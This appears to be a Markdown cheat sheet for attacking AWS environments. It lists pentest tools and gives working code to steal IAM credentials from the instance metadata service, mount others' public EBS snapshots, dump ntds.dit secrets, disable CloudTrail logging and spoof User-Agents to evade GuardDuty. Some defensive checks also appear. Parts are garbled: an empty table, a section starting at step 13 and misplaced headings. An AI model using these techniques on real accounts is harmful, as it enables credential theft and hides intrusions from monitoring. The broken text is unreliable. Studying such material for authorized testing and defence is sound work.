## Tools

* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins
  * Requires read-only permissions over the IAM service

```powershell
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Scan-AWShadowAdmins
```

* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set
  * Requires AWS keys

```powershell
$ git clone https://github.com/RhinoSecurityLabs/pacu
$ bash install.sh
# https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
```

* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled

```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --log-file bucket.out my_words
```

* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python

```python
import boto3
# Create an S3 client
s3 = boto3.client('s3')  # shown as an example; pass keys explicitly if needed
try:
    print(s3.list_buckets())
except Exception as e:
    print(e)
```

* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness

> It follows the guidelines of the CIS Amazon Web Services Foundations Benchmark and includes dozens of additional checks, including GDPR and HIPAA (100+).

* Requires: `arn:aws:iam::aws:policy/SecurityAudit`

```powershell
$ pip install awscli ansi2html detect-secrets
$ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role
```

* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS

```powershell
# https://github.com/nccgroup/PMapper
pip install principalmapper
pmapper argquery --principal '*' --resource user/PowerUser --preset connected
```

* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool

```powershell
$ git clone https://github.com/nccgroup/ScoutSuite
$ python scout.py PROVIDER --help
$ python scout.py azure --cli
```

* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files

```powershell
$ git clone https://github.com/nccgroup/s3_objects_check && cd s3_objects_check
$ python3 -m venv env && source env/bin/activate
$ pip install -r requirements.txt
$ python s3-objects-check.py -h
$ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
```

* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library

```powershell
python3 weirdAAL.py -m ec2_describe_instances -t demo
python3 weirdAAL.py -m lambda_get_account_settings -t demo
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo
```

* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments

```powershell
git clone https://github.com/duo-labs/cloudmapper.git
# sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli
find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges
```

* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS’s “public” mode

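Dufflebag itself is deployed as infrastructure into your own AWS account, but the underlying idea can be illustrated with a small boto3 sketch that enumerates EBS snapshots marked as publicly restorable (the region and output format are assumptions for the example, not dufflebag's actual interface):

```python
import boto3

# Illustration of what dufflebag hunts for: EBS snapshots whose
# create-volume permission is open to everyone ("public" mode)
ec2 = boto3.client("ec2", region_name="us-east-1")  # example region

paginator = ec2.get_paginator("describe_snapshots")
for page in paginator.paginate(RestorableByUserIds=["all"]):
    for snap in page["Snapshots"]:
        print(snap["SnapshotId"], snap["OwnerId"], snap.get("Description", ""))
```
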
## AWS Patterns

| Service | URL |
|---------|-----|

## AWS - Metadata SSRF

> AWS has released additional security defences against this attack.

:warning: Only works with IMDSv1.

Enabling IMDSv2: `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-tokens required`.

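To see why the attack stops working, compare how credentials are read from the metadata service under both versions. A minimal sketch using the `requests` library (assuming code execution or a very flexible SSRF on the instance): IMDSv1 answers a plain GET, while IMDSv2 first requires a session token obtained with a PUT request and a custom header, which a typical GET-only SSRF cannot send.

```python
import requests

BASE = "http://169.254.169.254/latest"
CREDS = BASE + "/meta-data/iam/security-credentials/"

# IMDSv1: a single unauthenticated GET is enough (this is what SSRF abuses)
role = requests.get(CREDS, timeout=2).text
print(requests.get(CREDS + role, timeout=2).json()["AccessKeyId"])

# IMDSv2: first obtain a session token with a PUT and a custom header,
# then send it on every request; a plain GET-only SSRF cannot do this
token = requests.put(BASE + "/api/token",
                     headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
                     timeout=2).text
headers = {"X-aws-ec2-metadata-token": token}
role = requests.get(CREDS, headers=headers, timeout=2).text
print(requests.get(CREDS + role, headers=headers, timeout=2).json()["AccessKeyId"])
```
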
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.

1. Head over to EC2 -> Volumes and create a new volume of your preferred size and type.
2. Select the created volume, right-click and select the "attach volume" option.
3. Select the instance from the instance text box and attach the EBS volume.

```powershell
aws ec2 create-volume --snapshot-id snapshot_id --availability-zone zone
aws ec2 attach-volume --volume-id volume_id --instance-id instance_id --device device
```

4. Now, log in to your EC2 instance and list the available disks using the following command: `lsblk`
5. Check if the volume has any data using the following command: `sudo file -s /dev/xvdf`
6. If the volume is empty (`file -s` returns `data`), format it to the ext4 filesystem: `sudo mkfs -t ext4 /dev/xvdf`. Skip this step if the volume was created from a snapshot, as formatting would erase its content.
7. Create a directory of your choice to mount the new ext4 volume, for example "newvolume": `sudo mkdir /newvolume`
8. Mount the volume to the "newvolume" directory using the following command: `sudo mount /dev/xvdf /newvolume/`
9. cd into the newvolume directory and check the disk space to confirm the volume mount: `cd /newvolume; df -h .`

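A minimal boto3 equivalent of the CLI commands above, assuming you already know the snapshot ID and have an instance running in the same availability zone (all IDs, the region and the device name are placeholders):

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # example region

# Create a volume from the target snapshot in the same AZ as your instance
vol = ec2.create_volume(SnapshotId="snap-0123456789abcdef0",
                        AvailabilityZone="us-east-1a")
ec2.get_waiter("volume_available").wait(VolumeIds=[vol["VolumeId"]])

# Attach it to your own instance, then mount it from the OS (lsblk, mount)
ec2.attach_volume(VolumeId=vol["VolumeId"],
                  InstanceId="i-0123456789abcdef0",
                  Device="/dev/sdf")
```
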
## AWS - Copy EC2 using AMI Image

13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
14. Locally run `secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets` (expects secretsdump.py to be in the PATH)

## Disable CloudTrail

```powershell
# Disable CloudTrail on specific regions
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-events --no-is-multi-region-trail --region eu-west-1
```

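The same tampering can be scripted with boto3. A minimal sketch, reusing the trail name from the example above (stopping log delivery is quieter than deleting the trail outright):

```python
import boto3

cloudtrail = boto3.client("cloudtrail", region_name="eu-west-1")  # example region

# Stop log delivery without deleting the trail
cloudtrail.stop_logging(Name="cloudgoat_trail")

# Or narrow the trail's scope, as with the CLI command above
cloudtrail.update_trail(Name="cloudgoat_trail",
                        IncludeGlobalServiceEvents=False,
                        IsMultiRegionTrail=False)
```
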
## Cover tracks by obfuscating CloudTrail logs and GuardDuty

:warning: When using awscli on Kali Linux, Pentoo Linux or Parrot Linux, GuardDuty raises a `PenTest:IAMUser/*` finding based on the User-Agent.

Pacu bypasses this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473).

```python
boto3_session = boto3.session.Session()
ua = boto3_session._session.user_agent()  # default botocore User-Agent string
if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower():
    self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
```

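Outside of Pacu, the same trick can be reproduced with botocore's `Config` object. A minimal sketch, where the User-Agent string itself is an arbitrary example value:

```python
import boto3
from botocore.config import Config

# Present a generic User-Agent instead of one revealing Kali/Parrot/Pentoo
config = Config(user_agent="aws-cli/2.15.0 Python/3.11 Windows/10")  # example value

sts = boto3.client("sts", config=config)
print(sts.get_caller_identity()["Arn"])
```
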
### PenTest:IAMUser/KaliLinux

#### Finding description

**An API was invoked from a Kali Linux EC2 instance.**

This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account. Your credentials might be compromised. Kali Linux is a popular penetration testing distribution that security professionals use to identify weaknesses in EC2 instances that require patching. Attackers also use it to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment. For more information, see [Remediating Compromised AWS Credentials](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_remediate.html).

#### Default severity: Medium

### PenTest:IAMUser/ParrotLinux

#### Finding description

**An API was invoked from a Parrot Security Linux EC2 instance.**

This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account. Your credentials might be compromised. Parrot Security Linux is a popular penetration testing distribution that security professionals use to identify weaknesses in EC2 instances that require patching. Attackers also use it to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment. For more information, see [Remediating Compromised AWS Credentials](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_remediate.html).

#### Default severity: Medium

### PenTest:IAMUser/PentooLinux

#### Finding description

**An API was invoked from a Pentoo Linux EC2 instance.**

This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account. Your credentials might be compromised. Pentoo Linux is a popular penetration testing distribution that security professionals use to identify weaknesses in EC2 instances that require patching. Attackers also use it to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment. For more information, see [Remediating Compromised AWS Credentials](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_remediate.html).

#### Default severity: Medium

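On the defensive side, these findings can be retrieved programmatically. A hedged boto3 sketch, assuming a GuardDuty detector already exists in the region (the filter uses the standard `FindingCriteria` syntax):

```python
import boto3

guardduty = boto3.client("guardduty", region_name="us-east-1")  # example region
detector_id = guardduty.list_detectors()["DetectorIds"][0]

criteria = {"Criterion": {"type": {"Eq": [
    "PenTest:IAMUser/KaliLinux",
    "PenTest:IAMUser/ParrotLinux",
    "PenTest:IAMUser/PentooLinux",
]}}}

finding_ids = guardduty.list_findings(DetectorId=detector_id,
                                      FindingCriteria=criteria)["FindingIds"]
if finding_ids:
    findings = guardduty.get_findings(DetectorId=detector_id,
                                      FindingIds=finding_ids)["Findings"]
    for finding in findings:
        print(finding["Type"], finding["Severity"], finding["UpdatedAt"])
```
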
## Security checks

https://github.com/DenizParlak/Zeus

* Ensure a log metric filter and alarm exist for route table changes
* Ensure a log metric filter and alarm exist for VPC changes (a sketch of such a filter and alarm is shown below)

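As an illustration of how one of these checks can be implemented, a hedged boto3 sketch that creates a CloudWatch Logs metric filter and alarm for VPC changes (the log group name, metric namespace, SNS topic and filter pattern are illustrative assumptions):

```python
import boto3

logs = boto3.client("logs", region_name="us-east-1")        # example region
cloudwatch = boto3.client("cloudwatch", region_name="us-east-1")

# Metric filter on the CloudTrail log group matching VPC-related API calls
logs.put_metric_filter(
    logGroupName="CloudTrail/DefaultLogGroup",  # assumed CloudTrail log group
    filterName="vpc-changes",
    filterPattern="{ ($.eventName = CreateVpc) || ($.eventName = DeleteVpc) || ($.eventName = ModifyVpcAttribute) }",
    metricTransformations=[{
        "metricName": "VpcEventCount",
        "metricNamespace": "CISBenchmark",
        "metricValue": "1",
    }],
)

# Alarm that fires on any matching event and notifies an (assumed) SNS topic
cloudwatch.put_metric_alarm(
    AlarmName="vpc-changes-alarm",
    MetricName="VpcEventCount",
    Namespace="CISBenchmark",
    Statistic="Sum",
    Period=300,
    EvaluationPeriods=1,
    Threshold=1,
    ComparisonOperator="GreaterThanOrEqualToThreshold",
    AlarmActions=["arn:aws:sns:us-east-1:123456789012:security-alerts"],
)
```
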
## References

* [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/)